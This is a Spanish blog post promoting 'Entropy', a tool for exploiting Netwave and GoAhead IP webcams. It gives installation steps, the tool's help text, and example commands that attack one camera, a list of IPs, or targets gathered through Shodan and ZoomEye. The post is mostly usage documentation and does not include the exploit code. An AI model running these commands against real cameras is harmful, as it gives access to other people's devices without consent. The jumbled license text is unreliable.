jueves, 26 de diciembre de 2019

Entropy, exploit de cámara web IP



Entropy es una poderosa herramienta de explotación para pruebas de penetración de cámaras web, también llamado Netwave y GoAhead IP Camera exploit.

Cómo instalar Entropy

cd entropy

chmod +x install.sh

./install.sh

Cómo desinstalar Entropy

 cd entropy

chmod +x uninstall.sh

./uninstall.sh

Cómo ejecutar Entropy

entropy -h

usage: entropy [-h] [-b {1,2}] [-o OUTPUTFILE] [-T TIMEOUT] [-t TASKS]
               [-c COUNT] [-q | -v]
               [-i IP | -l INPUTFILE | --shodan SHODAN | --zoomeye ZOOMEYE]
               [-u]

optional arguments:
  -h, --help            show this help message and exit
  -b {1,2}, --brand {1,2}
                        Choose the brand of IP Camera. 1 - represents Netwave,
                        2 - represents GoAhead.
  -o OUTPUTFILE, --output OUTPUTFILE
                        Output into path you input. The default path in dir
                        /tmp
  -T TIMEOUT, --timeout TIMEOUT
                        The default timeout for netwave is 300s.
  -t TASKS, --task TASKS
                        Run TASKS number of connects in parallel, default is
                        10.
  -c COUNT, --count COUNT
                        The number of IP you want to get from ZoomEye. The
                        maximum is 2000. Default is 100.
  -q, --quiet           Quiet mode.
  -v, --verbose         Show more informations.
  -i IP, --ip IP        The camera's IP and port. Example: 192.168.1.100:80
  -l INPUTFILE, --list INPUTFILE
                        The camera's IP:port address file. The file's format
                        like this 192.168.1.100:80 in a line.
  --shodan SHODAN       Your Shodan API Key. You can get help from
                        https://www.shodan.io/
  --zoomeye ZOOMEYE     Your ZoomEye API Key. You can get help from
                        https://www.zoomeye.org/api
  -u, --update          Update Entropy Exploit.

Ejemplos de Entropy exploit

Example of the exploiting a single camera
entropy -b 1 -i 192.168.1.100:80 -v  
Example of the exploiting cameras from a file
entropy -b 2 -l iplist.txt -v
Example of the exploiting cameras using shodan
entropy -b 2 -v --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

Descargo de responsabilidad de Entropy exploit 

INFO: El uso del Entropy Exploit para atacar objetivos sin previo consentimiento mutuo es ilegal.
Es responsabilidad del usuario final obedecer todas las leyes locales, estatales, federales e internacionales aplicables.
Los desarrolladores no asumen ninguna responsabilidad y no son responsables del mal uso o daño causado por este programa.

Licencia de Entropy exploit 

MIT License

Copyright (C) 2019, Entynetproject. All Rights Reserved.

Por la presente se otorga permiso, sin cargo, a cualquier persona que obtenga una copia de este software y los archivos de documentación asociados (el "Software"), para tratar para usar, copiar, modificar, fusionar, publicar, distribuir, sublicenciar y / o vender en el Software sin restricción, incluidos, entre otros, los derechos copias del Software
y para permitir a las personas a quienes pertenece el Software copias o partes sustanciales del software. Sujeto a las siguientes condiciones: El aviso de copyright anterior y este aviso de permiso se incluirán en todos APTITUD PARA UN PROPÓSITO PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO EL EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITO, INCLUYENDO PERO NO LIMITADO A LAS GARANTÍAS DE COMERCIABILIDAD, FUERA DE O EN CONEXIÓN CON EL SOFTWARE O EL USO U OTRAS OFERTAS EN EL LOS AUTORES O LOS TITULARES DE LOS DERECHOS DE AUTOR SERÁN RESPONSABLES POR CUALQUIER
RECLAMACIÓN, DAÑO U OTRO RESPONSABILIDAD, EN CASO DE ACCIÓN DE CONTRATO, TORTURA O DE
OTRA MANERA, DERIVADA DE, SOFTWARE.

No olvides Compartir... 

Siguenos en twitter: @disoftin - @fredyavila

No hay comentarios:

Publicar un comentario

Más leídas este mes